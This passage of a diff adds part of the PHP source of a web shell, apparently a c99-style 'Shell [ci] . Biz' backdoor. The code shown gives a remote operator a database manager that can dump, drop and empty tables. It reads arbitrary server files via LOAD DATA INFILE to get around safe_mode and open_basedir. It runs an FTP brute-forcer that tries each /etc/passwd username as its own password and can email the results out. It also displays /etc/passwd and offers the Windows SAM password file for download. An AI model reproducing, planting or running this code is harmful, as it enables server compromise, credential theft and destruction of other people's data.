type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; + echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; + $v = join (";",$dmptbls); + echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>»</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 borderColorLight=#000000 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function k1r4ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called Shell [ci] . Biz ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (k1r4ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"Shell [ci] . Biz ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."k1r4_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); k1r4exit();} +if ($act == "security") +{ + echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font 